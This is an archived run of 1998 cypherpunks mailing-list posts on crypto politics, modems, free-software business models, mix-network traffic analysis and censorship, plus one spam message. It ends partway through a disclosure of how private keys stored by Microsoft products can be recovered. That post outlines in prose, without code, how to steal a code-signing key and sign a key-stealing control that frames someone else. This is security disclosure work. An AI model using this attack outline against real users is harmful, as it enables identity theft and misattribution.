burdened with GAK, as with software from IBM and Lotus, it is flawed by
shear incompetence as with software from Microsoft and Netscape.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: You're throwing it all out the Windows!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNMTN3o9Co1n+aLhhAQHuagQApRiDHrPDtI82nUd8/7TOE64EZmlLn0zD
NoHK5edUYuCRdzKfw4/4MzmIHwrasF7IpJDoQ5djtkSc8AQCsSpI4vMlq1LiyU3K
DngvVGhVfsSxJ+Sbt5HAsQyEr0tnJmI92fswJrsvEMKEsd5sLhadrbW4e+CoQxUS
1m62eo1hAWs=
=Lsuq
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 21 Jan 1998 00:23:24 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Intel, MS, & Compaq to boost Inet access x30 w/ new modem [CNN]
Message-ID: <199801201649.KAA27012@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>    
>                REPORT: VENTURE PROMISES SPEEDIER INTERNET ACCESS
>                                        
>      Internet graphic January 20, 1998
>      Web posted at: 9:21 a.m. EST (1421 GMT)
>      
>      NEW YORK (AP) -- Lightning-quick Internet access is in the works
>      under a reported new venture between three titans of the computer
>      industry and most local telephone companies.
>      
>      Executives at Intel, Compaq Computer and Microsoft said in The New
>      York Times on Tuesday that they want to develop a new type of
>      personal computer modem that would allow access to World Wide Web
>      pages at speeds 30 times faster than the usual several seconds to
>      minutes it now takes.
>      
>      Perhaps more important, the product would plug into normal telephone
>      lines, which would remain connected to the outside world.
>      Consequently, users would not need to dial a service and could
>      conduct normal voice conversations over the same line, the Times
>      said.
>      

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 21 Jan 1998 03:37:32 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Deriving economic profits from writing FREE software?
In-Reply-To: <slrn6c0bra.sic.igor@manifold.algebra.com>
Message-ID: <v03102800b0eaa9ed68e4@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:27 PM -0800 1/18/98, Bill Stewart wrote:
>At 10:11 PM 1/16/98 -0600, Igor wrote:
>>However, aside from the psychic benefits, I would like to somehow derive
>>an economic profit from being a freeware author. So far, I feel that the
>>status of the author of a popular package does sound good on a resume, but
>>it is as far as I could get.
>>
>>Does anyone else feel the same way? Has anybody come up with a way to
>>cash in on the free programs that he writes?
>
>There's the standard shareware model - ask for $25.
>There's the Cygnus model - charge money for support.
>There's the Netscape/McAfee/etc. model - free for personal use,
>	charge money to companies that use it.
>There's the Eudora model - basic version free, bells&whistles extra.
>There's the advertising-banner model - the software/service is free,
>	but usage hits an advertising banner in some way that
>	filters money back to you.
>
>There are probably a lot more ways to do it as well, but it's a start.


Ah, but these are all chump change models.

How about:

There's the Mosaic model--develop a product with university funds, watch it
catch on, and then help found a company and make a quick $20 million or
more.

(A model also loosely paralleled in the founding of Cisco and Sun.)

And, quite seriously, the most important thing "shareware" does is to
establish one's credibility as a programmer. Many of the Mac shareware
programmers made almost nothing off of the paltry donations, but the
elegance of their products led to job opportunities and, even better,
startup opportunities.

(Lloyd Chambers, at PGP, Inc., for example, if I haven't confused him with
someone else.)

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <steve@tightrope.demon.co.uk>
Date: Tue, 20 Jan 1998 17:36:54 +0800
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: Deriving economic profits from writing FREE software?
In-Reply-To: <slrn6c0bra.sic.igor@manifold.algebra.com>
Message-ID: <19980120112950.01497@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, Jan 18, 1998 at 10:27:10PM -0800, Bill Stewart wrote:

> There's the standard shareware model - ask for $25.
> There's the Cygnus model - charge money for support.
> There's the Netscape/McAfee/etc. model - free for personal use,
> 	charge money to companies that use it.
> There's the Eudora model - basic version free, bells&whistles extra.
> There's the advertising-banner model - the software/service is free,
> 	but usage hits an advertising banner in some way that
> 	filters money back to you.

Does anyone have any economic studies (or stories) which compare
the effectiveness of these approaches?

-- 
Steve 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 21 Jan 1998 01:31:49 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Your local phone company (fwd)
Message-ID: <199801201759.LAA27407@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Ooops, I needed to do some editing that I missed....sorry for the confusion.

> that base 4800 baud. Faxes get the 9600 because they use dual-tones, neither
> of which is above the 4800. The problem with shoving more tones is that afer

I should have changed all those 4800's to 1200's. I couldn't remember which
one so I had picked one distinct from the example provided by ya'll and
missed changing it to the correct value per the references. I got sloppy.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 21 Jan 1998 01:31:08 +0800
To: cypherpunks@cyberpass.net
Subject: China's New Net Regs
Message-ID: <1.5.4.32.19980120172945.00749fb4@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Thanks to MK we offer the new Chinese net regulations
as published by the US Embassy in Beijing:

   http://jya.com/cn-netreg.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 21 Jan 1998 16:19:37 +0800
To: cypherpunks@www.video-collage.com
Subject: Re: Distributed stock trading system
In-Reply-To: <199801192238.QAA03188@manifold.algebra.com>
Message-ID: <3.0.5.32.19980120180340.00834c80@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 04:38 PM 1/19/98 -0600, Igor Chudov @ home wrote, but not in this order:
>I would like to hear your feedback on a project that I have just
>thought about.
>It is called a Distributed Asset Trading Network. It consists of
>Traders and Nodes. They trade Products (asset classes). A Product may
>be an Intel share, or a bond, or an option on S&P 500, or whatever. Who
>and how defines what the Product unit is is beyond the scope of this

Interesting gedanken-project.  Some related work is Bob Hettinga's 
geodesic networks and (Mark Miller?)'s agorics.

>The technical issues that are open, at the moment, are 
>1) clock synchronization, 
Long since solved - use NTP.  Assuming the nodes don't need to be
stealthy, they can just clock off each other; if they need stealth,
they should clock off some trusted worldwide internet providers.
If they need to be blazingly invisible, use a GPS receiver clock.
(Using NTP with each other makes it easy to estimate distances,
but that's a risk any time you've got uniform clocking and
reasonably fast-turnaround communication.)

>2) the need for a central authority to clear liability issues and 
You've described the Node as a "clearing corporation", with bonding
to cover liability.  The corporation and central authority both work
against your goal of "a) independent of borders and national laws."
Also, assuming that each Node posts bonds in about the same amount
as it accepts bonds posted with it, the bonds still don't provide
an incentive not to abscond with the money, since it steals about
as much as it forfeits in bond; expected positive future cash flow 
is what discourages the Node from absconding.  Posting bonds with
a central authority avoids this problem, but a central authority
is both a target for governments and for freelance thieves,
and a temptation for its operators to abscond.

>3) potential denial of service attacks through acquiring too
>many locks (again, maybe with the proper liability agreement, 
>it is not an issue).
That's a job for careful implementation; you don't want customers
taking down nodes either.

You didn't address a major problem:
0) Scalability
Talking to 10 other nodes in realtime is easy.  10000 is hard.
Not only do you need the bandwidth, but you've got to worry about
nodes that are down, or that you temporarily can't communicate with,
and you've got to be fast enough to respond to all their demand,
maintain state for your crypto sessions with them, recover from
your own outages, and deal with the queuing if they've all decided
that you've got the best price for something this second.

The more nodes you talk to, the harder it is to scale.
But the fewer nodes you talk to directly, the slower it is to
propagate information about prices, bids, and offers, and therefore
the harder it is to get prices to converge - since you discuss
eliminating arbitrage, bid-ask spreads, and expensive intermediaries,
this is a problem.  Also, assuming the system has convenient room
for negotiation, you'll still have time delays as people are deciding
what to do, so there's still arbitrage to be made, and depending
on your liability structure, there's probably room for low-balling
and high-balling on bids.


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 21 Jan 1998 01:51:40 +0800
To: declan@well.com
Subject: No Subject
Message-ID: <199801201744.SAA22154@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain




	ISLAMABAD, Pakistan (AP) - In a fresh move to promote Islamic
culture, Pakistan's TV censors have been busy.
	They have slashed footage of pop musicians sporting long hair and
jeans. Male and female co-hosts of local television programs are no more.
	Scores of commercials and programs have ended up on the cutting
room floor since the launching recently of a campaign by Prime Minister
Nawaz Sharif's government to impose its regimen of Islamic decency on
television.
	For example, a toothpaste advertisement was considered unseemly
because it showed a toothy young couple grinning at each other
affectionately. Gone are the soap and shampoo commercials that showed
"female glamour related to their bathing."
	Government officials say the campaign reflects Pakistan's
traditional Muslim culture.
	The new policies are aimed at promoting Pakistan's rich heritage
and Islamic traditions, not at trampling "acceptable" artistic expression,
said Saddiq-ul Farooq, prime minister's spokesman. "The line of
demarcation is that the animal instincts should not be aroused."
	But advertisers and artists say the new rules more reflect a slide
toward Islamic fundamentalism that stifles freedom of expression - and
costs them money.
	The campaign began in October after Prime Minister Nawaz Sharif
reportedly complained that lascivious Western culture was polluting
state-run Pakistan Television (PTV).
	PTV's censors took Sharif's gripe to heart.
	The censor board announced a new policy that banned footage of
women "giving indecent and vulgar looks which are considered contrary to
Islamic values." It also banned women from appearing in "jeans and
seductive dress."
	Then a letter went out to advertisers saying commercials which
depict "an alien locale and dresses not in harmony with our national
culture will not be sanctioned for telecast."
	In conservative Pakistan, where sex outside marriage is a crime
and many women don't venture outside the home without a veil, local film
and television is traditionally conservative.
	Even before the newest campaign, Pakistani censors were
discriminating, slicing footage of nudity, sexual intercourse, gratuitous
violence and foul language from imported films and television programs.
	But critics say the new rules have gone too far.
	Advertisers have been warned against "exhibiting of body contours"
and advised to avoid "unnecessary featuring of females."
	One of the first victims of the new rules was a soap commercial
that featured a head and shoulder shot of a well-known Pakistani actress
washing her face.
	Saying the footage was too seductive, censor board officials said
it left to the imagination whether the actress was wearing any clothes,
said Kareem Ramaal, an executive with Asiatic Advertising Ltd., the agency
that produced the commercial.
	"It's quite a perverted attitude," he said.
	Ramaal and other advertising executives say the new rules could
mean big losses for Pakistan's burgeoning advertising industry.
	Asiatic's clients have spent as much as $10 million producing some
of the commercials that have been forced off the air.
	"That's just money down the drain," he said.
	If advertisers pull out, it could mean millions of dollars in
losses for the cash-strapped state-run channel.
	PTV is Pakistan's only channel, but satellite dishes are making
headway in this nation of 140 million people, offering dozens of channels
over which the government has no control.
	A 1996 Gallup poll found that 58 percent of adults, about 38
million people, watch television. Seven percent said they had access to a
satellite dish.
	"Culture and religious faith mean different things to different
people ... the government should not even attempt to define them," the
independent English-language newspaper The News wrote in an editorial.
	Pakistani singer, Salman Ahmed believes that the government
worries that Western-influenced pop music and culture could foment
discontent among the country's young.
	Ahmed said it wasn't his long hair and jeans that got his rock
band, Junoon, banned from television, but rather government unhappiness
over its hits, which speak of Pakistan's social ills and government
corruption.
	"I think they are scared of us," Ahmed said. "The young generation
listens to us and follows us - especially the social songs."
	PTV officials dismissed Ahmed's accusation, saying there was a
difference between modernism and Westernization.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 21 Jan 1998 02:15:00 +0800
To: cypherpunks@cyberpass.net
Subject: Re: [Long] How to recover private keys for various Microsoft
Message-ID: <199801201809.TAA25056@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



On avoiding use of commercial encryption products:

In a session yesterday with a group of Japanese visiting 
the US to gather information on security products and 
export controls, a Westerner advised the group to avoid 
all commercial security products in any country,
domestic or exportables, due to probability of being 
compromised.

It was suggested instead to arrange a private service
with a banking institution to covertly ride financial 
transactions, inland and external.

Better was to arrange the same through military or 
governmental channels. Fees were claimed to be fairly 
reasonable depending on whether protection against
national courts and counter-intelligence was needed
at either origin or destination points.

It was emphasized that these practices are now normal
in countries where strongest info security was required 
for national economic protection against commercial and 
intelligence espionage, and that no one knowledgeable 
in the field would rely on commercial products from any 
source.

The Western briefers were not identifed.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 21 Jan 1998 12:55:54 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Your local phone company (fwd)
Message-ID: <199801210526.XAA30697@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "Douglas R. Floyd" <dfloyd@io.com>
> Subject: Re: Your local phone company
> Date: Tue, 20 Jan 1998 22:51:51 -0600 (CST)

> "Modem Tax" revisited?

By Jove, I think the boy has it...;)


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@dxm.org>
Date: Wed, 21 Jan 1998 04:30:11 +0800
To: "'Cypherpunks'" <cypherpunks@Algebra.COM>
Subject: security and hidden networks (was On the LAM--Local Area Mixes)
Message-ID: <01BD260F.18C88000@d850.pppdel.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain




summary

this post suggests that technically, routing through a sub-network 
does not necessarily increase complexity or hinder traffic analysis,
as it can be treated as a virtual node. given that, LAM-type networks
may not provide much protection in a politically unkind environment.
i also suggest a way of rating (or classifying) secure networks based
on how well they hide suspect data and routes in other traffic.

as this in response to tim may's LAM post, i'll respond quoting that.

Tim May <tcmay@got.net> writes:
>A message would enter the physical site, bounce around to N machines, and
>exit, perhaps going to other machines and sites, and back again, etc. (The
>image was of perhaps 20 or 30 cheap PCs linked with Ethernet in a set of
>apartments in Berkeley--obtaining search warrants or court orders to allow
>monitoring of all 20 or 30 machines, scattered across several physical
>addresses, would be "problematic.")

i won't repeat my objections to a reliance on "problematic" court orders, which
i've made in another post. let us simply assume, for example, that i am the
NSA, and i don't need court orders, but i'm a sneaky sort so i don't want to
go in with guns blazing just yet. Alice has a network, alice.net, 10.1.1.0. she
has many machines on this network, some hers, some belonging to Bob. 
when Alice and Bob plan stink-bomb attacks on the IRS (sorry, when they,
or Li-Xia and Bu-pang, write articles on human rights violations in xinjiang) 
to Carol and David, outside their network, they first bounce their packets around
their 30 machines.

i sniff all packets going into and out of the network 10.1.1.0, from the upstream
provider (Alice has her whole building in a faraday cage, which is ok because she
never tries to use her mobile phone indoors). so. does it matter in the least, to
me, whether alice wrote her last rant from kitchen.alice.net (10.1.1.1) or garage.alice.net
(10.1.1.2) or whether it was actually Bob - Bob Inc, to be safe - from 10.1.1.33?

it could matter politically/legally (if i wanted to prosecute) or technically (if i want
to trace traffic down, to, from or through alice's net). technically first: it doesn't
really matter. i treat alice's net as a hermetically sealed virtual "node"...

>-- the routing topology of the site may be an interesting area to look at.
>Ideally, a "Linda"-like broadcast topology (all machines see all packets,
>like messages in a bottle thrown into the "sea") could have certain

... which is all the more correct topologically if broadcast addresses (10.1.1.255)
are used. so i treat alice's net as a single node, and monitor traffic as it enters
and leaves that "node". just as i would monitor traffic entering and leaving a
single machine, without caring much which disk drive or memory bank it passed
through.

with a single physical entry and exit point to the network it can be treated exactly 
as if it were a single node for the purposes of any traffic analysis (security/traceability).
multiple physical connections might complicate it slightly, but if i'm sniffing them
all, and they connect to the same set of machines (i.e. the same network), not much
(if it's IP the address spaces may differ but that's a minor matter).

depending on what remailer math tells us - and we really do need remailer math, as
tim pointed out! - bouncing traffic around sub-nets may have little impact on
security. it could remain the same; i don't see how it could become much better;
it could plausibly get worse, if multiple nodes in a single subnet can eat into your 
random route hops resulting in concentration of traffic through fewer virtual "nodes".

the only situation in which this isn't true is if the source and destination of traffic
are both within the sealed network - presumably what would happen most of the
time with tim's suggestion of voice/high-bandwidth stuff.

now for the political/legal bit. given that i'd like to see cypherpunk technology as
daring enough to be of use outside western democracies, let's look at a slightly
challenging situation. you're a bunch of people, each with your own firm for added
safety, in this building. now i'm not a decent american cop, worried about court
orders etc. ok, i don't exactly want to shoot all of you at once. but if i am satisfied
(which i could be, using technical methods) that lots of "suspicious" stuff is coming
from your network, then i'll certainly come in and reeducate you all on your "errors
and distortions." (sorry, just finished a week of watching andrzej wajda films at a
retrospective.) 

oho. it's a BIG building. and i don't really suspect all of you. ok, i go have a chat
with the network admin - Alice - and hold her responsible. she has great respect
for the government and police and would never write such a nasty thing as "the
state tortures political prisoners?" uh oh. so i tell her that for the good of the country
she must let someone listen in at her machine ("you didn't keep logs? ah, that was
a mistake, no?") - i'm now inside, and the sealed network shrinks. of course if i'm 
impatient and don't believe her innocent approach, i just use the rubber hose. 

the same goes for multiple physical links into the same network.

can _technology_ - rather than relying on law-abiding cops, and rights-abiding
laws - provide a solution? the key is the BIG building. the more non-suspicious
routes there are - i.e. a route through normal, unsuspected people, typically
but not necessarily outside the physically well-protected area - the harder to 
usefully treat a network as a virtual node. looking at 10.1.1.0 as a node may 
help, just 256 people there; but 10.1.0.0 is a bit big to make a coherent "node"

so although a LAM may be a great way to _test_ new tech and protocols out,
i'd think it a big mistake to actually deploy it, as it were, on a large scale. it
wouldn't help at all in the tough spots, and it would only serve to make the 
easier spots tougher, strengthening the immune system of would-be tyrannical
states (i.e. the nicer western democracies). in general "WAMs" would be much
more helpful and secure. 

the other thing that helps is of course the degree of non-suspicious traffic on
suspected routes. putting them together, i think you can get some measure
of the utility of a protocol and topology. 

the ideal would a) make it technically impossible to trace the route of suspicious 
traffic; and b) make it politically/legally difficult to prosecute originators/destinations
of suspicious traffic. it would do this by a) blurring the distinction between suspicious
and "regular" routes; and b) make it difficult to distinguish suspicious from harmless
traffic on those routes; c) make it difficult or impossible to block suspicious routes
or intercept/monitor suspicious traffic without causing unacceptable deterioration
of service for "ordinary" traffic.

two ratios seem useful to me as a way of organising cryptoanarchic network protocols. 
suspicious routes/ordinary routes; suspicious/ordinary traffic on any route. an ideal universal
DC-Net with padding to keep constant throughput would have both ratios tending towards 1 - 
there is only one route - broadcast - for everyone; and traffic is constant so the degree of
really suspicious stuff is unknown.

pure Blacknet-type systems tend towards [1,0] - there is only one route, assuming everyone
uses it. but without padding, you could suspect all traffic.

Pipenet tends towards [0,1] - there are many routes, and they're all pretty suspicious
as it's possible for the monitor to discriminate among them. but traffic is constant, so
you don't know when to suspect. 

regards,
rishab

First Monday - The Peer-Reviewed Journal on the Internet 
http://www.firstmonday.dk/  Munksgaard International Publishers, Copenhagen
          
Intl & Managing Editor - Rishab Aiyer Ghosh (ghosh@firstmonday.dk) 
Mobile +91 98110 14574; Fax +91 11 2209608; Tel +91 11 2454717 
A4/204 Ekta Apts., 9 Indraprastha Extn, New Delhi 110092 INDIA







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@dxm.org>
Date: Wed, 21 Jan 1998 04:29:25 +0800
To: "'Cypherpunks'" <cypherpunks@Algebra.COM>
Subject: politics of topology (was On the LAM--Local Area Mixes)
Message-ID: <01BD260F.23755960@d850.pppdel.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain




m k gandhi used to say that it was good india was colonised by the _british_ -
the poor fools were vulnerable to non-violent rational argument and (relatively) 
concerned about such oddities as human rights.

one problem with tim may's idea for local area mixes is just that: relying on
US stickliness on wimpy rules for search/interception is all very well, but 
wouldn't fly in china. i won't get into the argument over how awful
the US state is here, but if all cypherpunk technology can fight is the "tyrannical"
democracies of the west, it's not much good, IMNSHO. 

besides, if such technology becomes widespread in, say, the US, then it's 
inevitable that the authorities will tend towards more _real_ tyrannical behaviour, 
diluting search/seizure protections and taking you closer to china. a weak vaccine
 _strengthens_ the microbe it is supposed to kill. 

today your tech may let you plan stink-bomb attacks on the IRS in peace; tomorrow
it may not be sufficient to let you publish articles critical of the goverment.

i always thought the cypherpunk idea ("write code" etc) was to develop tech
that is _independent_ of political protections. technology will not undermine the
power of governments, if it is based on (incorrect) assumptions that governments
will continue to restrain themselves (e.g. search & seizure) when faced by increasing
use of such tech. 

i should think that LAMs would be excellent test-beds for larger-scale systems,
but it is larger-scale systems, where you don't assume the government's _not_
snooping because it's squeamish, that matter more. 

best,
-rishab

First Monday - The Peer-Reviewed Journal on the Internet 
http://www.firstmonday.dk/  Munksgaard International Publishers, Copenhagen
          
Intl & Managing Editor - Rishab Aiyer Ghosh (ghosh@firstmonday.dk) 
Mobile +91 98110 14574; Fax +91 11 2209608; Tel +91 11 2454717 
A4/204 Ekta Apts., 9 Indraprastha Extn, New Delhi 110092 INDIA








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sales&marketingproz@diku.dk
Date: Wed, 21 Jan 1998 10:16:49 +0800
To: <cypherpunks@toad.com>
Subject: Certification
Message-ID: <936969691232@hsd_cranemelon.com>
MIME-Version: 1.0
Content-Type: text/plain





"From: Steve Camfield, SME Board of Directors


It is my privilege to formally invite you to become certified in sales or marketing 
management.  Certification sends a clear message to your customers and colleagues 
that you are a true professional and have surpassed the highest standards of education, 
experience, and knowledge.

For your convenience, I have placed full certification details and answers to questions 
you may have at www.selling.org  (see Certification). 


-------------------------
SME is the non-profit worldwide association of sales and marketing management.   
Your address was provided to us by one of our chapters based on meeting attendance,
 inquiry, or suggestion by a local SME chapter board member but you may ensure removal 
by pressing the "Remove" option at the bottom of www.selling.org.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 21 Jan 1998 10:08:03 +0800
To: cypherpunks@ssz.com
Subject: Re: (eternity) Eternity as a secure filesystem/backup medium
In-Reply-To: <3.0.5.32.19980117194905.008024e0@pobox1.stanford.edu>
Message-ID: <199801210204.DAA02141@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart writes:

> >Do the math, though, for 128bit.  There are traditional analyses
> >which include the amount of silicon on the earth, the number of atoms
> >in the universe, etc.  The general consensus is that traditional
> >techniques are not feasible for brute forcing 128bit ciphers before
> >the heat death of the universe.
> 
> Hard to say.  Assuming that Quantum Cryptography doesn't allow
> finite-sized computers to do large exponentially complex calculations
> in short finite time, you're probably limited by the number of atoms
> in the available supply of planets, and Heisenberg may still get you
> if that's not a low enough limit.  Moore's law isn't forever.

A practical 128-bit key-cracker could be built with about 10000 cubic
meters of silicon.  (Figure one transistor per cubic micron, 1 ghz
operation, do the math...)  The technology to build a computer of that
size is still a few years away, but it is theoretically possible to build
a 128-bit key-cracker without using quantum computers or travelling to
other planets.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 21 Jan 1998 11:14:45 +0800
To: cypherpunks@toad.com
Subject: Land Of The Freeh
Message-ID: <199801210255.DAA07141@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



News Of The Weird:

>* Where's Barry Scheck When You Need Him?  Malvin Marshall,
>27, was finally released from jail in North Charleston, S.C., on
>October 29 after being locked up for 6 weeks because a police field
>test had found that he had heroin in his pocket.  The state lab had
>finally gotten around to analyzing the substance, which was
>determined to be vitamin pills that had gone through a wash cycle
>while in his pants pocket.  Said a police lieutenant, "The field test
>[is] not foolproof." 

COPYRIGHT:  Neither the name News of the Weird nor any
issue, or portion, of News of the Weird may be used for <any>
commercial purpose <whatsoever>.  "Any commercial purpose"
includes something as small as a bartered advertisement on a Web
page.  If you have a Web page or a mailing list that you run purely
as a hobby at entirely your own expense, and it is freely accessible
by the public with <no fee charged>, you may use portions of
News of the Weird without express permission provided that the
portion(s) is(are) (1) not edited, (2) distinctly separated from
material that is <not> from News of the Weird, and (3) identified
on the Web site or message as from News of the Weird and with
this copyright notice affixed:  Copyright 1997 by Universal Press
Syndicate.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
Date: Tue, 20 Jan 1998 23:37:38 +0800
To: cryptography@c2.net
Subject: [Long] How to recover private keys for various Microsoft products
Message-ID: <88531016604880@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain



    How to recover private keys for Microsoft Internet Explorer, Internet
            Information Server, Outlook Express, and many others
                                      - or -
                 Where do your encryption keys want to go today?
 
                    Peter Gutmann, <pgut001@cs.auckland.ac.nz>
 
Summary
-------
 
Microsoft uses two different file formats to protect users private keys, the
original (unnamed) format which was used in older versions of MSIE, IIS, and
other software and which is still supported for backwards-compatibility reasons
in newer versions, and the newer PFX/PKCS #12 format.  Due to a number of
design and implementation flaws in Microsofts software, it is possible to break
the security of both of these formats and recover users private keys, often in
a matter of seconds.  In addition, a major security hole in Microsofts
CryptoAPI means that many keys can be recovered without even needing to break
the encryption.  These attacks do not rely for their success on the presence of
weak, US-exportable encryption, they also affect US versions.
 
As a result of these flaws, no Microsoft internet product is capable of
protecting a users keys from hostile attack.  By combining the attacks
described below with widely-publicised bugs in MSIE which allow hostile sites
to read the contents of users hard drives or with an ActiveX control, a victim
can have their private key sucked off their machine and the encryption which
"protects" it broken at a remote site without their knowledge.
 
Once an attacker has obtained a users private key in this manner, they have
effectively stolen their (digitial) identity, and can use it to digitally sign
contracts and agreements, to recover every encryption session key it's ever
protected in the past and will ever protect in the future, to access private
and confidential email, and so on and so on.  The ease with which this attack
can be carried out represents a critical weakness which compromises all other
encryption components on web servers and browsers - once the private key is
compromised, all security services which depend on it are also compromised.
 
A really clever attacker might even do the following:
 
- Use (say) an MSIE bug to steal someones ActiveX code signing key.
- Decrypt it using one of the attacks described below.
- Use it to sign an ActiveX control which steals other peoples keys.
- Put it on a web page and wait.
 
On the remote chance that the ActiveX control is discovered (which is extremely
unlikely, since it runs and deletes itself almost instantly, and can't be
stopped even with the highest "security" setting in MSIE), the attack will be
blamed on the person the key was stolen from rather than the real attacker.
 
This demonstrates major problems in both Microsoft's private key security
(an attacker can decrypt, and therefore misuse, your private key), and ActiveX
security (an attacker can create an effectively unstoppable malicious ActiveX
control and, on the remote chance that it's ever discovered, ensure that
someone else takes the blame).
 
 
Background
----------
 
About a year ago I posted an article on how to break Netscape's (then) server
key encryption to the cypherpunks list (Netscape corrected this problem at
about the same time as I posted the article).  However more than a year after
the code was published, and 2 1/2 years after a similar problem with Windows
.PWL file encryption was publicised, Microsoft are still using exactly the
same weak, easily-broken data format to "protect" users private keys.  To
break this format I simply dusted off my year-old software, changed the
"Netscape" strings to "Microsoft", and had an encryption-breaker which would
recover most private keys "protected" with this format in a matter of seconds.
 
In addition to the older format, newer Microsoft products also support the
PKCS #12 format (which they originally called PFX), which Microsoft render as
useless as the older format by employing the RC2 cipher with a 40-bit key.  In
a truly egalitarian manner, this same level of "security" is used worldwide,
ensuring that even US users get no security whatsoever when storing their
private keys.  However even RC2/40 can take awhile to break (the exact
definition of "a while" depends on how much computing power you have available,
for most non-funded attackers it ranges from a few hours to a few days).
Fortunately, there are enough design flaws in PKCS #12 and bugs in Microsofts
implementation to ensure that we can ignore the encryption key size.  This has
the useful - to an attacker - side-effect that even if Microsoft switch to
using RC2/128 or triple DES for the encryption, it doesn't make the attackers
task any more difficult.  By combining the code to break the PKCS #12 format
with the code mentioned above which breaks the older format, we obtain a single
